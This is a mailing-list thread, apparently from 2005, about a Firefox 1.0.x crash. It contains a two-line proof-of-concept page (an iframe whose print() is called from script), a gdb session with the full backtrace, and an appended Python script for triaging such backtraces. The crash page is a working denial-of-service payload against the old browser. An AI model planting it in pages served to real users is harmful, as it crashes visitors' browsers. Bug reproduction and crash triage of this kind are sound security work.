Hi,

This works in my Debian box with 1.0.2:

$ export LD_LIBRARY_PATH=/usr/lib/mozilla-firefox/
$ cat test.html
<html>
<body><iframe id="pocframe" name="pocframe" src=""></iframe>
<script type="text/javascript">
window.frames.pocframe.print();
</script>
</body>
</html>
$ export LD_LIBRARY_PATH=/usr/lib/mozilla-firefox/
$ gdb /usr/lib/mozilla-firefox/firefox-bin
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
(...)
(gdb) run ~/tmp/test/test.html
Starting program: /usr/lib/mozilla-firefox/firefox-bin ~/tmp/test/test.html
(no debugging symbols found)
(...)
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1220601760 (LWP 17803)]
0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
(gdb) where
#0 0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
#1 0xb7f46635 in XPTC_InvokeByIndex () from /usr/lib/mozilla-firefox/libxpcom.so
#2 0x083718ae in XPCWrappedNative::CallMethod ()
#3 0x08377f21 in XPC_WN_CallMethod ()
#4 0xb7fa1506 in js_Invoke () from /usr/lib/mozilla-firefox/libmozjs.so
#5 0xb7fab51d in js_Interpret () from /usr/lib/mozilla-firefox/libmozjs.so
#6 0xb7fa1bcc in js_Execute () from /usr/lib/mozilla-firefox/libmozjs.so
#7 0xb7f7cd14 in JS_EvaluateUCScriptForPrincipals () from /usr/lib/mozilla-firefox/libmozjs.so
#8 0x088bd382 in nsJSContext::EvaluateString ()
#9 0x0869341a in nsScriptLoader::EvaluateScript ()
#10 0x08693092 in nsScriptLoader::ProcessRequest ()
#11 0x08692c79 in nsScriptLoader::IsScriptEventHandler ()
#12 0x088896d3 in nsHTMLScriptElement::MaybeProcessScript ()
#13 0x08657d2f in nsGenericElement::AppendChildTo ()
#14 0x086c9765 in HTMLContentSink::ProcessSCRIPTTag ()
#15 0x086c7130 in HTMLContentSink::Init ()
#16 0x0849961e in CNavDTD::AddLeaf ()
#17 0x084977ae in CNavDTD::HandleScriptToken ()
#18 0x08498f59 in CNavDTD::OpenContainer ()
#19 0x08495cbf in CNavDTD::HandleDefaultStartToken ()
#20 0x08496936 in CNavDTD::HandleStartToken ()
#21 0x08494fcb in CNavDTD::BuildNeglectedTarget ()
#22 0x08494674 in CNavDTD::~CNavDTD ()
#23 0x084aae6d in nsParser::ResumeParse ()
#24 0x084aabc0 in nsParser::ResumeParse ()
#25 0x084abe85 in nsParser::DetectMetaTag ()
#26 0x08908acd in nsDocumentOpenInfo::Open ()
#27 0x0840966a in nsFileChannel::EnsureStream ()
#28 0x083c6acb in nsInputStreamPump::OnStateTransfer ()
#29 0x083c692f in nsInputStreamPump::EnsureWaiting ()
#30 0xb7f14c21 in nsInputStreamReadyEvent::EventHandler () from /usr/lib/mozilla-firefox/libxpcom.so
#31 0xb7f2b297 in PL_HandleEvent () from /usr/lib/mozilla-firefox/libxpcom.so
#32 0xb7f2b1c4 in PL_ProcessPendingEvents () from /usr/lib/mozilla-firefox/libxpcom.so
#33 0xb7f2ce59 in nsEventQueueImpl::NotifyObservers () from /usr/lib/mozilla-firefox/libxpcom.so
#34 0x08568735 in nsBaseWidget::FreeNativeData ()
#35 0xb7a04dbf in g_vasprintf () from /usr/lib/libglib-2.0.so.0
#36 0xb79df582 in g_main_depth () from /usr/lib/libglib-2.0.so.0
#37 0xb79e05f8 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#38 0xb79e0930 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#39 0xb79e0ed3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#40 0xb7c828f3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#41 0x08568a78 in nsAppShell::ReleaseGlobals ()
#42 0x08a0e8d4 in nsAppShellService::AttemptingQuit ()
#43 0x08c13800 in xre_main ()
#44 0x0834af24 in main ()

This is a simple bug in Firefox.

Bye,
Joxean Koret

On Tue, 2005-05-10 at 20:38 +0000, orebla Orebla wrote:
>
> I found this script around the net and it crashes Firefox:
>
> <!--PROOF OF CONCEPT
> The vulnerability can be exploited with the following 2 lines of code:
>
> <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
> <script
> type="text/javascript">window.frames.pocframe.print();</script>
> -->
>
> I have WinXP SP2 and Firefox 1.0.3.
>
> Why does Firefox crash???
>
> PS: I did not discover the vulnerability. Sorry for the English...
> :-)

--
Humanity's first sin was faith; its first virtue, doubt.
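As an added example (not part of Joxean's message or orebla's post), here is a small Python script that parses gdb `where` output like the trace above and pulls out what matters when triaging a crash like this one: the crashing frame, and the innermost frame belonging to the JS engine (libmozjs), below which every frame is native code reached directly from page script. The backtrace embedded in it is an excerpt of the trace above (frames #0-#10 and #44); the module name `firefox-bin` assigned to frames that gdb prints without a `from` clause is taken from the binary the post ran under gdb.

```python
import re
from dataclasses import dataclass

# Excerpt of the gdb "where" output from the post (frames #0-#10 and #44),
# embedded here so the example runs offline.
BACKTRACE = """\
#0  0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
#1  0xb7f46635 in XPTC_InvokeByIndex () from /usr/lib/mozilla-firefox/libxpcom.so
#2  0x083718ae in XPCWrappedNative::CallMethod ()
#3  0x08377f21 in XPC_WN_CallMethod ()
#4  0xb7fa1506 in js_Invoke () from /usr/lib/mozilla-firefox/libmozjs.so
#5  0xb7fab51d in js_Interpret () from /usr/lib/mozilla-firefox/libmozjs.so
#6  0xb7fa1bcc in js_Execute () from /usr/lib/mozilla-firefox/libmozjs.so
#7  0xb7f7cd14 in JS_EvaluateUCScriptForPrincipals () from /usr/lib/mozilla-firefox/libmozjs.so
#8  0x088bd382 in nsJSContext::EvaluateString ()
#9  0x0869341a in nsScriptLoader::EvaluateScript ()
#10 0x08693092 in nsScriptLoader::ProcessRequest ()
#44 0x0834af24 in main ()
"""

# One gdb frame line: "#N  0xADDR in func () [from module]"
FRAME_RE = re.compile(
    r"^#(?P<num>\d+)\s+(?P<addr>0x[0-9a-fA-F]+) in (?P<func>\S+) \(\)"
    r"(?: from (?P<module>\S+))?\s*$"
)

# gdb omits "from ..." for frames inside the main executable; the post ran
# firefox-bin under gdb, so that is the name used for such frames (assumption).
MAIN_BINARY = "firefox-bin"


@dataclass
class Frame:
    num: int
    addr: int
    func: str
    module: str


def parse_backtrace(text):
    """Parse gdb 'where' output into Frame objects, ignoring non-frame chatter."""
    frames = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("#"):
            continue  # e.g. "(gdb) where" or "(...)" lines in a pasted session
        m = FRAME_RE.match(line)
        if not m:
            raise ValueError("unrecognised frame line: %r" % line)
        frames.append(Frame(int(m["num"]), int(m["addr"], 16),
                            m["func"], m["module"] or MAIN_BINARY))
    return frames


def crash_site(frames):
    """Frame #0 is where the signal was delivered."""
    return frames[0]


def script_entry_frame(frames):
    """Innermost JS-engine frame. Everything below it (lower frame numbers) is
    native code that a web page's script drove into, i.e. the reachable surface."""
    for f in frames:
        if "libmozjs" in f.module:
            return f
    return None


def native_path_from_script(frames):
    """Function names from the crash site up to (not including) the JS engine."""
    entry = script_entry_frame(frames)
    if entry is None:
        return [f.func for f in frames]
    return [f.func for f in frames if f.num < entry.num]


def triage(text):
    frames = parse_backtrace(text)
    site = crash_site(frames)
    entry = script_entry_frame(frames)
    return {
        "crash_func": site.func,
        "crash_module": site.module,
        "crash_addr": "0x%08x" % site.addr,
        "script_entry": entry.func if entry else None,
        "native_path": native_path_from_script(frames),
        "frame_count": len(frames),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(BACKTRACE), indent=2))
```

Run it on the full trace from the post and the `native_path` is the four frames between the crash and `js_Invoke`: the XPConnect call bridge (`XPC_WN_CallMethod`, `XPCWrappedNative::CallMethod`, `XPTC_InvokeByIndex`) and the crashing `GlobalWindowImpl::MakeScriptDialogTitle`, which is exactly the set worth reading first when deciding whether a crash is script-reachable.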